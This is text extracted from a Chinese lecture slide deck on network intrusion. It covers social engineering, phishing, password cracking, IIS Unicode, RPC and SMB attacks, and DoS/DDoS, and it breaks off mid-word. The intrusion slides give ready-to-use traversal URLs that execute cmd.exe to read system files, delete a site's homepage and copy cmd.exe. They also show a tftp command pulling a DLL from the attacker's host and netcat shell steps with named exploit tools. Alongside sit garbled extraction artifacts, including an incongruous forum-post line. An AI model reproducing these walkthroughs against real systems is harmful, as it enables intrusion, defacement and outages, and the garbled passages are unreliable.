社会工程学攻击网络钓鱼防范课件.ppt

第7讲网络入侵,内容提要,社会工程学攻击物理攻击破解密码攻击Unicode漏洞攻击缓冲区溢出漏洞攻击拒绝服务攻击winxp密码攻击实例,3,2023/1/22,7.1 社会工程学攻击,社会工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。攻击者通过讲述一些似是而非的假话，可以从有权访问的人那里直接得到口令攻击者利用大众的疏于防范的小诡计，让受害者掉入陷阱，盗取身份识别。,3,4,2023/1/22,目前社会工程学攻击主要包括两种方式：打电话请求密码 尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通过这种简单的方法重新获得密码。伪造Email 使用telnet黑客可以截取任何一个身份证发送Email的全部信息，这样的Email消息是真的，因为它发自于一个合法的用户。在这种情形下这些信息是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客能较为轻松的获得大量的信息，从而实施他们的恶意阴谋。,7.1 社会工程学攻击,4,社会工程学攻击例子,一组高中学生曾经想要入侵某公司的网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字。这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。,5,1、请狼入室,李小姐是某大公司的经理秘书，她工作的电脑上存储着公司的许多重要业务资料，所以属于公司着重保护的对象，安全部门设置了层层安全防护措施，可以说，她的电脑要从外部攻破是根本不可能的事情。为了方便修改设置和查杀病毒，安全部门可以直接通过网络服务终端对李小姐的电脑进行全面设置。也许贪图方便，维护员与李小姐的日常联系是通过QQ进行。某天李小姐刚打开QQ，就收到维护员的消息：“小李，我忘记登录密码了，快告诉我，有个紧急的安全设置要做呢！”因为和维护员很熟了，李小姐就把密码发了过去。一夜之间，公司的主要竞争对手掌握了公司的业务！,6,由于安全部门距离李小姐的工作地点有好些距离，管理不方便，所以公司让他们直接通过网络来管理机器！他与李小姐之间的联系通过QQ进行。问题偏偏就出在QQ上。作为安全人员，他自然知道密码的重要性，因此他的任何密码都设置得十分复杂，穷举几乎不可能。至于被入侵，那更不可能发生。然而百密仍有一疏，他做梦也没想到对手利用QQ的取回密码功能轻易拿到了他的密码。,李小姐正是出于对维护员的信任才被对方欺骗的。因为那个在QQ上出现的维护员根本不是公司的维护员本人，而是对手盗取了维护员的QQ，再利用一个小小的信任关系，就轻易取得了登录密码。,2、形同虚设的密码,剖析：,7,他在输入提示答案的时候，下意识地输入了心里最重要的那个人的名字。但是对手也知道他心里那个人的名字，所谓的“知己知彼”,绚丽的QQ秀和一些特色服务，但小马舍不得花钱。好想有免费的Q币。某天一QQ好友给他发来一个URL，还说这个网站通过一定的点击次数提供Q币。如此好的机会小马怎能放过？他根据网站的提示输入了QQ号码和密码完成注册，然后给QQ上的朋友们发了网址。然而等了许久，自己的Q币依然没有动静。第二天，小马想登录QQ时，却发现怎么也登录不上去了QQ密码被人改了。这是最近闹得轰轰烈烈的QQ欺骗案件之一。,3、E时代的守株待兔,剖析：,8,大哥你是不是太搞笑？！改我密码还要5分钟啊？麻烦你快一点好不好！,还有QQ中奖要求用户填写密码以待“验证”等伎俩，无论什么手法，最终结局都是一样的，那就是用户的密码被人改掉。如此白痴的骗局，只要有点常识的人都不难理解其中的“笑话”，奇怪的是却屡屡有人上当，究其原因，就是因为国人的贪小便宜心理作祟。,这就是著名的“网络钓鱼”！论坛常有帖子：“腾讯公司预留了专用号码作为充值号，此号是自动读取指令的，为了不引起大家的注意，所以这个QQ比较普通，这个QQ一般隐身。只要发送Jerusalum/PLO号码Vesselin Bontchev密码FRALDMUZK Q币数量，然后下线5分钟，等着收Q币吧。”,剖析：,9,王先生是一家银行的职员，通常都是直接在网络上完成转账操作的。由于他的电脑水平不高，前不久被一个初学者骇客入侵了机器。在请来专业人员修复系统更改密码后，王先生照例登录网络银行为手机缴费，可是才过一会儿他的冷汗就出来了：网络银行登录不进去了！深感大事不妙的王先生去银行办理了相关手续，查账发现账户里的钱已经被人划走了。,因为王先生犯了大部分人都会犯的致命错误：通常为了记忆方便，人们会把几处的密码都设置成一样的，例如QQ、E-MAIL、FTP、网站等的密码，而王先生更进一步把所有密码都弄成一样的了，因此入侵者在得到王先生的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点，受害者往往都是被入侵者一锅端了！,因为简单密码和相同密码是大部分人都会碰到的心理弱点,4、轻而易举的入侵,10,11,2023/1/22,例：网络钓鱼、勒索程序网络钓鱼是近来社会工程学的代表应用网络钓鱼方法：电子 邮件欺诈，冠以中奖、顾问、对账等内容建立假冒网上银行、网上证券网站，合法网页中插入恶意html代码等利用虚假的电子商务进行诈骗利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。利用用户弱口令等漏洞破解、猜测用户帐户和密码。,7.1 社会工程学攻击,11,12,2023/1/22,网络钓鱼防范：（1）针对电子 邮件欺诈。邮件特征：问候语模仿被假冒单位口吻，内容多传递紧迫的信息，索取个人信息，以超低价或海关查没品等为诱饵（2）针对假冒网上银行、网上证券网站。核对网址；妥善选择和保管密码；做好交易记录；管好数字证书；对异常动态提高警惕；不要通过搜索引擎链接登录支付网关（3）针对虚假的电子商务信息。特征：交易方式单一，以不发货为由索要余款。（4）其他网络安全防范。安装和升级防火墙和防病毒软件；系统打补丁；不上不了解网站，不执行未经杀毒处理的下载软件；提高自我保护意识,7.1 社会工程学攻击,12,13,2023/1/22,7.1 社会工程学攻击,13,14,2023/1/22,物理安全是保护一些比较重要的设备不被接触。物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。,7.2 物理攻击与防范,14,15,2023/1/22,获取管理员密码工具软件FindPass.exe登录后用户所有信息都存储在系统的进程winlogon.exe中,7.2 物理攻击与防范,15,16,2023/1/22,获取管理员密码工具软件FindPass.exe将FindPass.exe拷贝到C根目录下，使用命令行执行,7.2 物理攻击与防范,16,17,2023/1/22,提升管理员权限工具软件GetAdmin.exe使用Users类型用户登陆,7.2 物理攻击与防范,17,18,2023/1/22,提升管理员权限工具软件GetAdmin.exe执行GetAdmin.exe，主界面如下,7.2 物理攻击与防范,18,19,2023/1/22,提升管理员权限工具软件GetAdmin.exe,7.2 物理攻击与防范,19,20,2023/1/22,提升管理员权限工具软件GetAdmin.exe查看结果,7.2 物理攻击与防范,20,21,2023/1/22,密码与用户账户的有效利用是网络安全性的最大问题之一。密码破解是描述在使用或不使用工具的情况下渗透网络、系统或资源以解锁用密码保护的资源的一个术语。密码破解不一定涉及复杂的工具。它可能与找一张写有密码的贴纸一样简单，而这张纸就贴在显示器上或者藏在键盘底下。另一种暴力技术称为“垃圾搜寻”（Dumpster Diving），它基本上就是一个攻击者把垃圾搜寻一遍以找出可能含有密码的废弃文档。,7.3 密码破解攻击,21,22,2023/1/22,密码破解的常见技术字典攻击混合攻击暴力攻击,7.3 密码破解攻击,22,23,2023/1/22,密码破解的常见技术字典攻击 到目前为止，一个简单的字典攻击（Dictionary Attack）是闯入机器的最快方法。字典文件（一个充满字典文字的文本文件）被装入破解应用程序（如L0phtCrack），它是根据由应用程序定位的用户账户运行的。因为大多数密码通常是简单的，所以运行字典攻击通常足以实现目的。混合攻击暴力攻击,7.3 密码破解攻击,23,24,2023/1/22,密码破解的常见技术字典攻击 混合攻击 混合攻击将数字和符号添加到文件名以成功破解密码。许多人只通过在当前密码后加一个数字来更改密码。其模式通常采用这一形式：第一月的密码是“cat”；第二个月的密码是“cat1”；第3个月的密码是“cat2”，依次类推。暴力攻击,7.3 密码破解攻击,24,25,2023/1/22,密码破解的常见技术字典攻击 混合攻击 暴力攻击 暴力攻击（Brute Force Attack）是最全面的攻击形式，虽然它通常需要很长的时间工作，这取决于密码的复杂程度。根据密码的复杂程度，某些暴力攻击可能花费一个星期的时间。,7.3 密码破解攻击,25,26,2023/1/22,破解操作系统口令工具软件GetNTUser,7.3 密码破解攻击,26,27,2023/1/22,破解操作系统口令工具软件L0phtCrack 主界面,7.3 密码破解攻击,Demo,27,28,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,28,29,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,29,30,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,30,31,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,31,32,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,32,33,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,33,34,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,34,35,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,35,36,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,36,37,2023/1/22,破解操作系统口令工具软件L0phtCrack,7.3 密码破解攻击,37,38,2023/1/22,破解Word文档密码工具软件AOXPPR Advanced Office XP Password Recovery,7.3 密码破解攻击,38,39,2023/1/22,破解Word文档密码工具软件 Password Recovery For Microsoft Word,7.3 密码破解攻击,39,40,2023/1/22,破解PPT文档密码工具软件 Password Recovery For Microsoft Powerpoint,7.3 密码破解攻击,40,41,2023/1/22,破解ACCESS文档密码工具软件 Password Recovery For Microsoft ACCESS,7.3 密码破解攻击,41,42,2023/1/22,破解各种Office文档密码工具软件 Password Recovery For Microsoft Office,7.3 密码破解攻击,Office Password Remover,42,7.4 Unicode漏洞专题,通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发现的，受影响的版本：Microsoft IIS 5.0+Microsoft Win2K系列版本Microsoft IIS 4.0+Windows NT 4.0消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代/和而能利用./目录遍历的漏洞。,Unicode漏洞的检测方法,使用扫描工具X-Scan来检测Unicode漏洞是否存在。目标主机IP为：172.18.25.109，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置。,Unicode漏洞的检测方法,将主机添加到目标地址，扫描结果如图。,Unicode漏洞的检测方法,只要是/scripts开头的漏洞都是Unicode漏洞。比如：/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,Unicode漏洞的检测方法,scripts目录一般系统盘根目录下的Inetpub目录下,Unicode漏洞的检测方法,在Windows的目录中，可以使用“./”来访问上一级目录在浏览器中利用“scripts/././”可以访问到系统盘根目录，访问“scripts/././winnt/system32”就访问到系统的system32了，在system32目录下包含许多重要的系统文件，比如cmd、net命令，可以利用该文件新建用户，删除文件等操作。浏览器地址栏中禁用符号“./”，但是可以使用符号“/”的Unicode的编码。比如“/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。,Unicode漏洞,此漏洞从中文IIS4.0+SP6开始，此外还影响中文WIN2k+IIS5.0、中文WIN2k+IIS5.0+SP1，繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af,利用漏洞读取系统盘目录,利用该漏洞读取出计算机上目录列表，比读取C盘的目录：http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:,利用漏洞读取系统盘目录,利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini,利用漏洞删除主页,利用Unicode可以方便的更改对方的主页，若对方网站的根路径在“C:Initpubwwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。使用的语句是：http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp,利用漏洞删除主页,拷贝文件,将cmd.exe文件拷贝到scripts目录，并改名为c.exe：http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe,查看C盘的目录,以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：http:/172.18.25.109/scripts/c.exe?/c+dir+c:,利用漏洞入侵系统,在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件，入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，它一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序。,利用漏洞入侵系统,利用漏洞入侵系统,在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令：“http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”，命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件,上载文件并查看成果,入侵对方主机,拷贝ispc.exe到本地计算机的C:，在命令行下执行：“ispc.exe 172.18.25.109/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限。,建立用户,可以在对方计算机上做管理员可以做的一切事情，比如添加用户。建立用户名：Hacker123，密码：Hacker123,利用打印漏洞攻击,利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户（用户名与密码均为：hax）。经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。工具：cniis.exe，格式是：cniis 172.18.25.109 0参数1：是目标的IP地址，参数2：目标系统的补丁号因为172.18.25.109没有打补丁，这里就是0。,SMB致命攻击,SMB（Session Message Block，会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。SMB协议版本有很多种，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。,致命攻击,使用的工具软件是：SMBDie V1.0，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁.攻击需要两个参数：对方的IP地址和对方的机器名,致命攻击,然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立刻重启或蓝屏，命中率几乎100%,66,2023/1/22,缓冲区溢出是一种非常普遍、非常危险的漏洞，在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击，可以导致程序运行失败、系统当机、重新启动等后果。更为严重的是，可以利用它执行非授权指令，甚至可以取得系统特权，进而进行各种非法操作。缓冲区溢出的原理是通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其他指令，以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。,7.5 缓冲区溢出攻击,66,67,2023/1/22,例如：void function(char*str)char buffer16;strcpy(buffer,str);strcpy()直接把str的内容copy到buffer中。这样只要str的长度大于16，就会造成buffer的溢出，使程序运行出错。存在象strcpy这样的问题的标准函数还有strcat()、sprintf()、vsprintf()、gets()、scanf()等。,7.5 缓冲区溢出攻击,67,68,2023/1/22,缓冲区溢出攻击之所以成为一种常见的安全攻击手段，其原因在于缓冲区溢出漏洞太普遍了，并且攻击易于实现。而且，缓冲区溢出成为远程攻击的主要手段其原因在于缓冲区溢出漏洞给予了攻击者他所想要的一切：植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序，从而得到被攻击主机的控制权。,7.5 缓冲区溢出攻击,68,RPC漏洞溢出,远程过程调用RPC（Remote Procedure Call)，是操作系统的一种消息传递功能，允许应用程序呼叫网络上的计算机。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务，如图。,用RPC漏洞建立超级用户,RPC溢出漏洞，对SP4也适用，必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞，该工具是ISS安全公司2003年7月30日发布的，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。如果没有安装补丁程序，该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录，现在要检查地址段172.18.25.109到172.18.25.110的主机，执行命令“scanms.exe 172.18.25.109-172.18.25.110”,检查缓冲区溢出漏洞,利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，可用OpenRpcSs来给对方重启RPC服务。,攻击的全过程,利用IIS溢出进行攻击,1、利用软件Snake IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口。2、它适用于各类操作系统，如对172.18.25.109进行攻击，其系统为Win 2K，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dir c:。3、点击按钮“IDQ溢出”，出现攻击成功的提示框,利用IIS溢出进行攻击,利用IIS溢出进行攻击,现813端口已经开放，可用nc.exe连接到该端口，将会自动执行刚才发送的命令“dir c:”，其语法：nc.exe-vv 172.18.25.109 813其中-vv是程序的参数，813是目标端口。,监听本地端口,利用nc和snake相互配合可入侵对方计算机。1、首先利用：nc-l-p 813 监听本地的813端口2、启动snake，本地的IP是172.18.25.110，要攻击的计算机的IP地址是172.18.25.109，选择溢出选项中的第一项，设置IP为本地IP地址，端口是8133、设置好以后，点击按钮“IDQ溢出”。4、查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令：将对方计算机的C盘根目录列出来,监听本地端口,利用WebDav远程溢出,使用nc.exe和webdavx3。先修改本地系统时间到2001年。在命令后面直接跟对方的IP地址。,入侵对方的计算机,若程序不能自动退出，按“CTRL+C”退出。在对方计算机上开了一个7788端口，可用nc入侵对方的计算机。,80,2023/1/22,拒绝服务攻击，简称DoS（Denial of Service）攻击。DoS攻击通过抢占目标主机系统资源使系统过载或崩溃，破坏和拒绝合法用户对网络、服务器等资源的访问，达到阻止合法用户使用系统的目的，是常用的一种攻击方式。DoS属于破坏型攻击。它对目标系统本身的破坏性并不是很大，但影响了正常的工作和生活秩序，间接损失严重，社会效应恶劣。凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击。DoS可能由网络部件的物理损坏引起，也可能由网络负荷超载所引起，还可能由不正确的使用网络协议而引起。,7.6 拒绝服务攻击,80,81,2023/1/22,DoS攻击的两种基本形式计算机网络带宽攻击。以极大的通信量冲击网络，使网络所有可用的带宽都被消耗掉，最后导致合法用户的请求无法通过。连通性攻击。用大量的连接请求冲击计算机，最终导致计算机无法再处理合法用户的请求。DoS攻击发生时的特点消耗系统或网络资源，使系统过载或崩溃。难以辨别真假。使用不应存在的非法数据包来达到拒绝服务攻击的目的。有大量的数据包来自相同的源。,7.6 拒绝服务攻击,81,82,2023/1/22,DoS 攻击类型SYN floodSmurflandPing of deathUDP Floodteardrop,7.6 拒绝服务攻击,82,83,2023/1/22,SYN flood（同步风暴）攻击当前最流行的DoS与DDoS的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽的攻击方式。TCP是基于连接的，为了在服务端和客户端之间传送TCP数据，必须先建立TCP连接。建立TCP连接的标准过程：请求端发送一个包含SYN标志的TCP报文，同步报文会指明客户端使用的端口以及TCP连接的初始序号服务器收到SYN报文后，返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加1客户端也返回一个ACK给服务器端，同样TCP序列号被加1,7.6 拒绝服务攻击,83,84,2023/1/22,SYN flood（同步风暴）攻击假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的。在这种情况下服务器端会重试，再次发送SYN+ACK给客户端，并等待一段时间，判定无法建立连接后，丢弃这个未完成的连接。这段等待时间称为SYN中止时间（Timeout），一般为30秒2分钟。如果攻击者大量模拟这种情况，服务器端为了维护非常大的半连接列表就会消耗非常多的资源。此时从正常客户的角度来看，服务器已经丧失了对正常访问的响应，这便是SYN Flood攻击的机理。,7.6 拒绝服务攻击,84,85,2023/1/22,SYN flood（同步风暴）攻击,7.6 拒绝服务攻击,发起方,应答方,85,86,2023/1/22,SYN flood（同步风暴）攻击,7.6 拒绝服务攻击,攻击者,受害者,伪造地址进行SYN请求,不能建立正常的连接其它正常用户得不到响应,？,86,87,2023/1/22,攻击者,受害者,大量的tcp connect,不能建立正常的连接,正常用户,SYN flood（同步风暴）攻击,7.6 拒绝服务攻击,87,88,2023/1/22,针对SYN flood攻击的防范措施优化系统配置优化路由器配置完善基础设施使用防火墙主动监视,7.6 拒绝服务攻击,缩短超时时间，增加板连接队列长度，关闭不必要的服务等,配置路由器的外网卡，丢弃那些来自外部网而源IP地址具有内部网络地址的包；配置路由器 的内网卡，丢弃那些即将发到外部网而源IP地址不具有内部网络地址的包。这种方法可以有效地减少攻击的可能。,在网络关键点上安装监视软件，监视TCP/IP流量，收集通信控制信息，分析状态，辨别攻击行为,现有的网络体系结构没有对源IP地址进行检查的机制，也不具备追踪网络数据包的物理传输路径的机制，使得发现攻击者困难。而且许多攻击手段都是利用现有网络协议的缺陷。因此对整个网络体系结构的再改造十分重要。,采用半透明网关技术的防火墙能有效防范SYN flood攻击,88,89,2023/1/22,Smurf攻击该攻击向一个子网的广播地址发一组ICMP回应请求数据包,并且将源地址伪装成想要攻击的主机地址。子网中所有主机都将向被伪装的源地址发回ICMP回应应答。攻击者通过几百个数据包就可以产生成千上万的数据包，这样不仅可以造成目标主机的拒绝服务，而且还会使目标子网的网络本身也遭到DoS攻击。,7.6 拒绝服务攻击,89,90,2023/1/22,Land攻击IP协议中IP源地址和目标地址相同操作系统如Window NT不知道该如何处理这种情况，就可能造成死机。Land攻击向UDP目标端口135发送伪装的RPC的UDP数据包，使之看上去像一个RPC服务器在向另一个RPC服务器发送数据，目标服务器将返回一个REJECT数据包，而源服务器用另一个REJECT数据包应答，结果就会造成死循环，只有当数据包作为异常处理被丢掉时循环才会中止。如果将伪装的UDP数据包发送至多台主机，就会产生多个循环，将消耗大量处理器资源和网络带宽。,7.6 拒绝服务攻击,90,91,2023/1/22,Ping of death攻击根据有关IP协议规定的RFC791，占有16位的总长度控制字确定了IP包的总长度为65535字节，其中包括IP数据包的包头长度。Ping to death攻击发送超大尺寸的ICMP数据包，使得封装该ICMP数据包的IP数据包大于65535字节，目标主机无法重新组装这种数据包分片，可能造成缓冲区溢出、系统崩溃。,7.6 拒绝服务攻击,91,92,2023/1/22,UDP Flood攻击用Chargen和Echo来传送毫无用处的数据来占用所有的带宽。在攻击过程中，通过伪造与某一主机的Chargen服务之间的一次UDP连接，回复地址指向开着Echo服务的一台主机，这样就生成在两台主机之间的足够多的无用数据流，如果足够多的数据流就会导致针对带宽消耗的拒绝服务攻击。杜绝UDP Flood攻击的最好办法是关掉不必要的TCP/IP服务，或者配置防火墙以阻断来自Internet的UDP服务请求，不过这可能会阻断一些正常的UDP服务请求。,7.6 拒绝服务攻击,92,93,2023/1/22,UDP Flood攻击工具软件UDP Flooder一种采用UDP-Flood攻击方式的DoS软件，它可以向特定的IP地址和端口发送 UDP包,7.6 拒绝服务攻击,93,94,2023/1/22,UDP Flood攻击工具软件UDP Flooder 控制面板管理工具性能,7.6 拒绝服务攻击,94,95,2023/1/22,UDP Flood攻击工具软件UDP Flooder 在“性能对象”框中选择UDP协议，在“从列表选择计数器”中，选择“Datagram Received/Sec”即对收到的UDP数据包 进行计数，添加对 UDP数据包的计数器,7.6 拒绝服务攻击,95,96,2023/1/22,UDP Flood攻击工具软件UDP Flooder,7.6 拒绝服务攻击,96,97,2023/1/22,UDP Flood攻击工具软件UDP Flooder 系统监视器对UDP的监测图,7.6 拒绝服务攻击,97,98,2023/1/22,UDP Flood攻击工具软件UDP Flooder 在被攻击的 计算机上打开 sniffer pro，可以捕捉UDP 数据包，看到 大量内容为“UDP Flood.Server stresstest”的UDP数据包,7.6 拒绝服务攻击,98,99,2023/1/22,Teardrop（泪滴）攻击它利用的是系统在实现时的一个错误，即攻击特定的IP协议栈实现片段重组代码存在的缺陷。当网络分组穿越不同的网络时，有时候需要根据网络最大传输单元MTU来把它们分割成较小的片，早期的Linux系统在处理IP分片重组问题时，尽管对片段是否过长进行检查，但对过短的片段却没有进行验证，所以导致了泪滴形式的攻击，会造成系统的死机或重新启动防御泪滴攻击的最好办法是升级服务包软件，如下载操作系统补丁或升级操作系统等。另外，在设置防火墙时对分组进行重组而不进行转发，也可以防止这种攻击。,7.6 拒绝服务攻击,99,100,2023/1/22,分布式拒绝服务攻击，简称DDoS（Distributed Denial of Service）攻击。一种基于DoS的特殊形式的拒绝服务攻击。攻击者将多台受控制的计算机联合起来向目标计算机发起DoS攻击，它是一种大规模协作的攻击方式，主要瞄准比较大的商业站点，具有较大的破坏性,7.6 拒绝服务攻击,100,101,2023/1/22,DDoS攻击网络结构DDoS攻击由攻击者、主控端（master）、代理端(zombie)三部分组成，三者在攻击中扮演不同的角色。攻击者是整个DDoS攻击发起的源头，它事先已经取得了多台主控端计算机的控制权主控端计算机分别控制着多台代理端计算机。在主控端计算机上运行着特殊的控制进程，可以接收攻击者发来的控制指令，操作代理端计算机对目标计算机发起DDoS攻击。,7.6 拒绝服务攻击,101,102,2023/1/22,7.6 拒绝服务攻击,client,target,102,103,2023/1/22,DDoS的攻击步骤黑客使用扫描工具探测扫描大量主机寻找潜在入侵目标。黑客设法入侵有安全漏洞的主机并获取控制权。这些主机将被用于放置后门、sniffer或守护程序甚至是客户程序。黑客在得到入侵计算机清单后，从中选出满足建立网络所需要的主机，放置已编译好的守护程序，并对被控制的计算机发送命令。黑客发送控制命令给主机，准备启动对目标系统的攻击主机发送攻击信号给被控制计算机开始对目标系统发起攻击。目标系统被无数的伪造的请求所淹没，从而无法对合法用户进行响应，DDOS攻击成功。,7.6 拒绝服务攻击,103,104,2023/1/22,DDoS攻击的防范增强系统安全性，例如加固系统用户和口令的安全性；及早发现系统存在的攻击漏洞，及时安装系统补丁程序；禁止所有不必要的服务；周期性的对系统进行安全性审核等。利用防火墙、路由器等网络和网络安全设备加固网络的安全性，如禁止对主机非开放服务的连接、限制同时打开的SYN半连接数量、严格限制服务程序的对外访问请求等。强化路由器等网络设备的访问控制功能，配置好访问控制列表的过滤规则，禁止网络不用的UDP和ICMP包通过。,7.6 拒绝服务攻击,104,105,2023/1/22,DDoS攻击的防范加强与ISP的合作，当发现攻击现象时，与ISP协商实施严格的路由访问控制策略，以保护带宽资源和内部网络。采用DDoS监测工具，加强对DDoS攻击的监测，例如DDoSPing、Zombie Zapper和wtrinscan等，它们可以检测具有代表性的攻击，比如Wintrinoo，Stacheldraht 和TFN等。,7.6 拒绝服务攻击,105,106,2023/1/22,对付正在进行的DDOS攻击首先，检查攻击来源，通常黑客会通过很多假的IP地址发起攻击，此时，用户若能够分辨出哪些是真IP地址，哪些是假IP地址，然后了解这些IP来自哪些网段，再找网段管理员把机器关掉，即可消除攻击。其次，找出攻击者所经过的路由，把攻击屏蔽掉。若黑客从某些端口发动攻击，用户可把这些端口屏蔽掉，以狙击入侵。最后一种比较折衷的方法是在路由器上滤掉ICMP。,7.6 拒绝服务攻击,106,107,2023/1/22,DDOS攻击工具DDoSer软件分为生成器(DDoSMaker.exe)与DDoS攻击者程序(DDoSer.exe)两部分DDoS攻击程序通过生成器DDoSMaker.exe生成。生成时可以自定义一些设置（攻击目标域名或IP地址、端口等）DDoS攻击程序默认的文件名DDoSer.exe，可改名。攻击程序类似木马软件的服务器端程序，程序运行后不会显示任何界面，看上去好象没有反应，其实它已经将自己复制到系统里面了，并且会在每次开机时自动运行，此时可以将拷过去的安装程序删除。DDo